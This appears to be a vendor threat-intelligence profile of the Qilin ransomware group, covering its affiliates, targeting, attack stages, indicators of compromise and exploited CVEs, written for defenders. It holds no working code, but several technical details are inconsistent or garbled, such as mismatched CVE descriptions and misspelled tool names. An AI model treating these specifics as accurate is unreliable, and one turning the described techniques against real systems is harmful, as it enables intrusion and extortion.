THREAT ACTOR

Qilin

7.3
THREAT LEVEL
EMERGENCE DATE
Jul 2022
CATEGORY
Ransomware-as-a-Service
AFFILIATIONS

Strategic partnerships with Scattered Spider (UNC3944) and Moonstone Sleet (North Korea); infrastructure overlap with BianLian

DEscription

Qilin emerged in July 2022 as a Ransomware-as-a-Service (RaaS) operation, initially branded as Agenda before rebranding in September 2022. Operating through a mature affiliate model, the group provides advanced ransomware tools and infrastructure while employing double extortion tactics that combine data encryption with threats to leak stolen information on their dark web leak site.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
lethality
Evaluates the potential for damage from the attack, including the ability to disrupt operations, and cause financial loss, damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Ransomware-as-a-Service (RaaS)

Qilin operates independently while avoiding targets in the Commonwealth of Independent States (CIS), suggesting connections to Russian-speaking threat actors. Affiliate recruitment happens through underground forums and dark web platforms, with the network seeing major growth since late 2023. Affiliates typically receive 80-85% of ransom proceeds, earning higher percentages for larger payouts.

Current Status: Active, consistently posting dozens of new victims monthly across healthcare, manufacturing, financial services, and government sectors.

Threat Level:
7.3

Origins and Methodology

Built on a foundation of customization and cross-platform capabilities, Qilin has evolved into a significant enterprise threat through continuous technical refinement. The group's development of the Qilin.B variant and partnerships with established actors like Scattered Spider reflect its maturity in the ransomware ecosystem.

What is the Evolution of Qilin Ransomware?
0.1
Formation

Launched as Agenda in July 2022, the operation rebranded to Qilin in September 2022. Since then, it has steadily expanded both technical capabilities and its affiliate network through continuous platform improvements.

0.2
EVOLUTION

Transitioning from Golang to Rust marked a turning point, bringing better performance and enhanced cross-platform capabilities. The Qilin.B variant introduced in fall 2024 added dynamic encryption selection and improved anti-forensic features, representing the group's most advanced iteration yet.

0.3
Lineage/Connections

Qilin maintains strategic partnerships with Scattered Spider (UNC3944), which has adopted Qilin payloads for targeted financial sector campaigns. North Korean threat actors associated with Moonstone Sleet have deployed Qilin ransomware, which, according to Microsoft, represented the first instance that the state-sponsored actors deployed ransomware developed by a Ransomware-as-a-Service operator. Infrastructure analysis reveals technical overlap with BianLian operations, suggesting shared resources or operational knowledge.

Strategic partnerships define much of the group's operational approach. Scattered Spider (UNC3944) has integrated Qilin payloads into financial sector campaigns, while North Korean actors linked to Moonstone Sleet have also deployed the ransomware. Infrastructure overlaps with BianLian suggest shared resources or operational knowledge between groups.

Which Unique Techniques Does Qilin Use?

TECHNIQUE

DETAILS

Infection Vectors

Initial compromise typically occurs through spear phishing campaigns and exploitation of exposed services. The group actively targets vulnerabilities in Citrix ADC, RDP, Fortinet devices, and VMware ESXi systems. Post-compromise tools include RMM software and Cobalt Strike for establishing control. Recent campaigns heavily leverage CVE-2024-21762 and CVE-2024-55591 against Fortinet infrastructure.

Target Selection

Large enterprises remain the primary focus, particularly in healthcare, manufacturing, financial services, and government sectors. Healthcare organizations make up more than 10% of victims, especially those running extensive virtual infrastructure. While United States entities see the most activity, automated Fortinet exploitation has expanded operations into Spanish-speaking countries.

Operational Complexity

Attacks unfold in distinct phases starting with careful reconnaissance and credential collection. After establishing persistence, operators move laterally through networks before initiating data theft and finally deploying encryption. Affiliates tailor each attack, customizing file extensions, termination lists, and ransom demands to match their targets. Advanced features include multi-threaded encryption and robust anti-forensic capabilities.

Key Features & Technical Details

Qilin’s ransomware stands out due to its advanced encryption, modularity, and cross-platform adaptability, making it a formidable tool in the hands of affiliates. The ransomware allows for a high degree of customization, enabling affiliates to tailor their attacks based on the target’s infrastructure. This flexibility has contributed to Qilin’s rise in prominence in the ransomware space. Below is a detailed breakdown of Qilin’s technical features and capabilities.

FEATURE

DETAILS

Encryption Method

Implements ChaCha20, AES-256-CTR, and RSA-4096 with OAEP padding. Smart selection between algorithms based on target hardware for optimal speed

File Extension

Affiliates configure custom extensions like .MmXReVIxLV per campaign

Ransom Note

Customizable templates adapted for each victim organization

Double Extortion

Combines file encryption with data theft, threatening release on TOR-hosted leak sites for non-payment

Communication Channels

Primary C2 infrastructure operates through 188.34.188.7 with multiple fallback servers

Deployment Speed

Full attack chains typically execute over 24-72 hours

Payment Method

Accepts Bitcoin or Monero cryptocurrency

Operational Model

RaaS structure providing 80-85% revenue share to affiliates

Activities

The group maintains high operational tempo with consistent victim posting across multiple sectors, with a particular focus on organizations where operational disruption carries severe consequences, leveraging double extortion to maximize pressure on victims.

Which Industries Are Most Vulnerable to Qilin?

Industrial and manufacturing organizations see the heaviest targeting, as operational disruptions in these sectors often force rapid ransom payments. Professional services firms and healthcare providers also face regular attacks, with the group recognizing their need for continuous operations and sensitive data handling. Consumer retail and technology companies experience steady targeting, while government entities face less frequent but highly disruptive incidents.

Geographic patterns show United States organizations bearing the majority of attacks, though automated scanning and exploitation tools have pushed operations into Latin America and Spanish-speaking regions. Any organization running VMware ESXi faces heightened risk given the group's specialized tooling for virtual environments. Similarly, exposed RDP endpoints, unpatched Fortinet appliances, or outdated Citrix ADC installations create easy entry points for initial access.

HAL Most Recent Attacks

Modus Operandi

Each attack follows a methodical progression designed to maximize impact while avoiding detection.

Details

Exploits vulnerabilities in Citrix ADC (CVE-2023-3519), Fortinet devices (CVE-2024-21762, CVE-2024-55591), and exposed RDP services. Spear phishing campaigns deliver malicious attachments while operators leverage brute force attacks, stolen passwords from initial access brokers, and weak credentials.

Additional vectors include cross-system credential spraying, RDP & service account hijacking, and zero-day exploitation of CVE-2025-31324 targeting public-facing Veeam, Citrix, and Fortinet systems.

Details

Maps networks through Active Directory enumeration using PowerShell AD queries, ShareFinder.ps1, BloodHound, and MassSQL to identify domain controllers, backup systems, and critical infrastructure. Angry IP Scanner provides additional network reconnaissance capabilities.

Details

Deploys RMM tools including AnyDesk, TeamViewer, ScreenConnect, and RDP alongside Cobalt Strike C2 and Silver C2 beacons. PowerShell scripts harvest stored Chrome credentials to expand access across compromised environments.

Details

Uses token impersonation and Pass-The-Hash (PTH) techniques while exploiting Microsoft antivirus weaknesses through unpatched service paths and weak GPOs. Deploys Bring Your Own Vulnerable Driver (BYOVD) attacks for DLL sideloading and abuses scheduled tasks running as SYSTEM. The Rust-based variants add complexity to forensic analysis while operators disable security services (T1562).

PowerShell/batch scripts disable Windows Defender while BYOVD attacks using T1068.sys driver bypass security controls. Leverages trusted binaries like certutil.exe, bitsadmin.exe, and powershell.exe for payload delivery while bypassing UAC through legitimate tools with signed certificates. Performs network-wide security policy tampering and manipulates default-admin-REG configurations.

Details

Harvests credentials through keyloggers, memory dumps, and browser stores, focusing on domain administrator privileges. Embedded Mimikatz extracts credentials directly from LSASS process memory for unrestricted network access.

Details

Maintains encrypted communication through C2 infrastructure at 193.106.175.107, 45.134.140.69, and backup servers. QDoor attacks establish persistent Cobalt Strike/Silver beacons for interactive access while preventing traffic inspection.

Details

Spreads via SMB/Admin shares (T1021.002), WinRM, WMI using winrm.exe, PowerShell, and Imppacket's wmiexec.py. PsExec (native & Imppacket's psexec.py) and RDP enable manual operations while legitimate RMM tools blend malicious activity with normal administration.

Details

Steals data using WinSCP, 7-Zip, WinRAR, PowerShell, Rclone + Mega.nz, Google Drive, Dropbox, and HTTPS tunnels via Cobalt Strike/Silver. FTP/WebDAV connections to controlled infrastructure and Bluetooth for air-gapped networks ensure successful data theft before encryption begins.

Details

Establishes multiple backdoors through scheduled tasks (T1053) and boot-time scripts (T1547) across critical systems to survive partial remediation attempts.

Details

Creates severe operational disruption through systematic encryption, particularly devastating for VMware ESXi environments. Utilizes multi-pass encryption technique for enhanced data protection and operational security during encryption processes.

Details

Deploys ChaCha20, AES-256-CTR, or RSA-4096 encryption (T1486) with the Qilin.B variant automatically selecting optimal algorithms. Executes kill processes for data security, creates exclusions for specific modes (normal, step-step, fast, percent), and implements multi-threaded selective encryption with custom extensions. Deployment occurs via admin shares or GPO with self-deletion post-execution.

Details

Demands range from $50,000 to several million with outliers reaching $50 million.

Details

Removes forensic evidence by deleting Volume Shadow Copies (T1490) using vssadmin.exe, disabling restore points, and wiping logs. Prevents safe mode access and implements multi-phase log clearing through PowerShell automation. Maintains continuous forensic evidence removal and event log clearing throughout operations. Self-deleting executables minimize attack traces.

Indicators of Compromise (IOCs)

Network defenders should monitor for these specific artifacts that indicate potential Qilin activity.

INDICATOR

DETAILS

File Hashes

SHA256: 9e1f8165ca3265ef0ff2d479370518a5f3f4467cd31a7b4b006011621a2dd752 for primary ransomware binary
MD5: 64ca549e78ad1bd3a4bd2834b0f81080 for Qilin variant

IP Addresses

193.106.175.107 (primary C2 server)
45.134.140.69 (backup infrastructure)
184.174.96.70 (data exfiltration)
180.131.145.73 (affiliate panel)
184.174.96.74 (additional C2)

Domains/URLs

188.34.188.7 (C2 communication endpoint)

File Names

decryptor_399060b2.exe (decryption tool)
enc.exe (encryption binary)

File Extensions

.MmXReVIxLV

Exploits and Vulnerabilities

EXPLOITS AND VULNERABILITIES

CVE

CVSS

DESCRIPTION

Citrix ADC RCE

CVE-2023-3519

9.8

Unauthenticated remote code execution

ZeroLogon

CVE-2020-1472

10.0

Active Directory compromise without authentication

Windows SMB

CVE-2020-0787

7.8

BITS elevation to SYSTEM

Fortinet Auth Bypass

CVE-2024-21762

9.6

Authentication bypass in FortiOS

Fortinet RCE

CVE-2024-55591

9.8

Remote code execution without authentication

SAP Zero-Day

CVE-2025-31324

10.0

Pre-disclosure exploitation

Beyond these specific vulnerabilities, attacks often exploit weak VPN configurations, exposed RDP services, and unpatched systems. Social engineering through targeted spear phishing remains a consistent initial access method.